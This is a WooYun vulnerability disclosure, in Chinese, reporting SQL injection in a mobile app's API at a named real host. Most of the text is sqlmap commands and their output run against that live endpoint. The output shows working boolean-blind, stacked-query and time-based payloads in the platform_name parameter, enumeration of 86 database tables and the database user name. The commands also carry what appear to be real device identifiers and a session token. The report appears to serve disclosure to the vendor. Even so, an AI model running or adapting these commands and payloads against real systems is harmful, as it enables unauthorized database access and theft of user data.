乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-14: 厂商已经主动忽略漏洞,细节向公众公开
存在注入
话不多说,看代码:
kingdomdeMacBook-Pro:sqlmap-dev king$ python sqlmap.py -u "http://api.himoca.com/moca/System/Info" --data "uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW%2BtqMl8qJcqSTz%2FjBpBUtjdVgDxL10mcu8%2Bx3W7ePe%2FZrG9zLI3twPtqPaHXmg%0AgubMdTF%2BFtSwN8Y%2FDKzFGiZvGFPI%2FQOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVr%0Aj38Y2ETW%2FLuo%2FYCFM8I%3D%0A&platform_name=android*&version_api=102&imei=358239058886799&versionCode=4080&mac=cc%3Afa%3A00%3Af4%3Ade%3A43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6" --tables -D "moca" --threads 10 sqlmap/1.0-dev-9fff88d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 08:11:10custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y[08:11:13] [INFO] resuming back-end DBMS 'mysql'[08:11:13] [INFO] testing connection to the target URL[08:11:13] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND 5849=5849 AND 'DDCV'='DDCV&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android'; SELECT SLEEP(5)-- &version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND SLEEP(5) AND 'SKyz'='SKyz&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6---[08:11:13] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.32back-end DBMS: MySQL 5.0.11[08:11:13] [INFO] fetching tables for database: 'moca'[08:11:13] [INFO] fetching number of tables for database 'moca'[08:11:13] [INFO] resumed: 86[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 6[08:11:13] [INFO] resumed: advert[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 11[08:11:13] [INFO] resumed: advert_copy[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 5[08:11:13] [INFO] resumed: agent[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 10[08:11:13] [INFO] resumed: agent_user[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 5[08:11:13] [INFO] resumed: album[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 10[08:11:13] [INFO] resumed: api_config[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 5[08:11:13] [INFO] resumed: award[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 10[08:11:13] [INFO] resumed: award_1105[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 10[08:11:13] [INFO] resumed: award_1118[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 14[08:11:13] [INFO] resumed: award_360_1203[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 8[08:11:13] [INFO] resumed: award_sd[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 9[08:11:13] [INFO] resumed: award_wdj[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 13[08:11:13] [INFO] resumed: award_wdj1224[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 11[08:11:13] [INFO] resumed: bank_config[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 13[08:11:13] [INFO] resumed: banner_config[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 18[08:11:13] [INFO] resumed: banner_config_copy[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] resumed: 8[08:11:13] [INFO] resumed: black_ip[08:11:13] [INFO] retrieving the length of query output[08:11:13] [INFO] retrieved: 13^C[08:11:15] [ERROR] user aborted[*] shutting down at 08:11:15kingdomdeMacBook-Pro:sqlmap-dev king$ python sqlmap.py -u "http://api.himoca.com/moca/System/Info" --data "uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW%2BtqMl8qJcqSTz%2FjBpBUtjdVgDxL10mcu8%2Bx3W7ePe%2FZrG9zLI3twPtqPaHXmg%0AgubMdTF%2BFtSwN8Y%2FDKzFGiZvGFPI%2FQOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVr%0Aj38Y2ETW%2FLuo%2FYCFM8I%3D%0A&platform_name=android*&version_api=102&imei=358239058886799&versionCode=4080&mac=cc%3Afa%3A00%3Af4%3Ade%3A43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6" --current-user sqlmap/1.0-dev-9fff88d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 08:11:33custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y[08:11:34] [INFO] resuming back-end DBMS 'mysql'[08:11:34] [INFO] testing connection to the target URL[08:11:34] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND 5849=5849 AND 'DDCV'='DDCV&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android'; SELECT SLEEP(5)-- &version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: uid=0&os=android&platform_id=358239058886799&token_key=jjdZZfVlBEF1WPW+tqMl8qJcqSTz/jBpBUtjdVgDxL10mcu8+x3W7ePe/ZrG9zLI3twPtqPaHXmggubMdTF+FtSwN8Y/DKzFGiZvGFPI/QOF2Tp9soe4MWxLeTjogZBugJCmIMDCEGTIdAjs33QoaUVrj38Y2ETW/Luo/YCFM8I=&platform_name=android' AND SLEEP(5) AND 'SKyz'='SKyz&version_api=102&imei=358239058886799&versionCode=4080&mac=cc:fa:00:f4:de:43&imsi=&channel=yyb&os_version=19&version=1.9.4&time=1425080154&key=044f80fb0af7f70de606a8ab9f69e3b6---[08:11:34] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.32back-end DBMS: MySQL 5.0.11[08:11:34] [INFO] fetching current user[08:11:34] [INFO] resumed: [email protected].%current user: '[email protected].%'[08:11:34] [INFO] fetched data logged to text files under '/Users/king/.sqlmap/output/api.himoca.com'
恩,86个表,看起来不少
如上
过滤
未能联系到厂商或者厂商积极拒绝